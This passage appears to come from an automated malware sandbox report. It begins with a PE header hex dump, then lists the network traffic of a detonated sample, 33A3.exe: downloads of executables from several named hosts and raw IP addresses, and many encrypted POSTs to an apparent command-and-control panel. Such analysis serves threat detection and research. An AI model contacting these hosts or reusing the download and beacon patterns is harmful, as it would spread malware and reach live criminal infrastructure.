00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 68 01 00 50 00 00 00 00 90 90 02 e8 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 69 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5e 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3f e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 70 00 00 00 00 01 00 00 72 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 00 8f 02 00 80 01 00 00 46 09 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 94 00 00 00 90 90 02 00 96 00 00 00 a2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic	HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uueesayjrfreir.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iwsxcppjhqhjgrrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thkyawmtyirckg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thkyawmtyirckg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: trad-einmyus.comData Raw: 12 87 8a 98 1c f5 d5 c3 be 38 0d 35 0d cd 91 88 35 12 dd 31 d8 30 68 9f c8 ec aa 82 88 a0 9b 84 1a b6 54 a2 18 18 ce e2 9e d2 f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 1f 94 9a 32 4a 99 09 23 c7 06 7d 46 57 78 a6 b2 bf 5e d0 c1 96 c3 19 7f 01 38 09 bc 49 61 f3 7d 28 46 7b c4 0c f2 84 19 a3 1c 50 00 66 b0 b5 25 2c 21 e2 71 f7 8d 32 1d d7 ea 75 8b 53 5a 31 d4 11 e7 58 99 ac 82 b7 d8 1d 87 2c 80 13 7d 16 50 1a 90 50 8f cb 2d e4 e5 15 e8 80 11 05 69 91 f3 f5 8f e8 09 44 e2 82 b4 d0 b1 1b 49 ca 9b c4 b2 3a 55 3c 47 4d 90 84 4e 6b 29 a9 ed c3 4c e6 55 78 34 80 62 2a c6 cf 51 b8 5e a9 52 ea a2 13 70 8d 6c f1 96 8a 36 bc fc 6f 0a d9 56 6a cc fd fa d9 52 f8 ed 47 3e b9 1a 89 9e 55 68 d8 b2 4d bd 46 b0 46 41 31 Data Ascii: 85510hTki\Fu$f]d2J#}FWx^8Ia}(F{Pf%,!q2uSZ1X,}PP-iDI:U<GMNk)LUx4b*Q^Rpl6oVjRG>UhMFFA1
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rioevlgrijblpvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tipxeencccax.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uqmdmpeitsjpr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://exglegmgsoinxfa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://foqijkgaubdv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://woopcmiqbunxss.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ygfxxlyxtugpt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mjfdxwjlegvlo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iomelhkuumg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://psvrsaaxqdgtape.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ihtjdfldhcmdsyu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ltqpgqldqfpdbn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://guuoxthmrquxeg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vjnupjdvrapfef.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pdwlmngyryf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bpekfuqcomkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oagagegmxjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uixyrqbtokxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wxiiulglaeast.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tgavifdbsqysl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rjuutmrbshngx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lvmnvbwulwkgv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bsmclpnjtgf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nbhwmwqlrnqx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tghxfbpwpyne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tosbfmevenvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uijilgjtmap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://smqxfaescqr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rgwmudjewscyl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lwpyeiimsmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yulmcjqodavf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uvaxpgauwksv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xsufixnxoxd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pilatjvtgqwtdre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: trad-einmyus.com

Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.253.69
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 185.154.13.143
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.167
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

9_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic	HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic	HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic	HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167

Source: 33A3.exe, 00000010.00000003.2558089861.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 33A3.exe, 00000010.00000003.2558921582.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 33A3.exe, 00000010.00000003.2559114058.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: trad-einmyus.com
Source: global traffic	DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: 157.123.68.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.safeautomationbd.com
Source: global traffic	DNS traffic detected: DNS query: cajgtus.com
Source: global traffic	DNS traffic detected: DNS query: nessotechbd.com
Source: global traffic	DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: global traffic	DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uueesayjrfreir.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Fri, 24 May 2024 15:38:48 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:38:58 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:39:28 GMTServer: Transfer.sh HTTP Server 1.0Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Served-By: Proudly served by DutchCodersContent-Length: 15Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 15:39:36 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=pGm99wmCAuWP2Xlm2F3H6Nj9DPbdQ46hGe7nOuAhATk-1716565176-1.0.1.1-DlNAaO6bu8OAFP_xmvFB7grrrpanrPetiZUyTUkHFvojunqzTItQfwj9eB8esQ.4wpT2mFviM6LezISvdQjt_g; path=/; expires=Fri, 24-May-24 16:09:36 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5L0uV8QrmrBrxrdD4Opq5u%2BY0334aVpWrGqharJomzjGUMN7vtPMkndODipg%2FCuHLhz3pzPpXHUt%2Bm1wBd9id0W0TBzyGqBU16NzoCa0XyEQYaNQt26d5BZrQmzzDGCJZnJ5fQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=WUxgC_R7cGcnsTb65gzUOT34Uc2FnsTMpXY2h4cy8K8-1716565176237-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 888e611f5941420b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 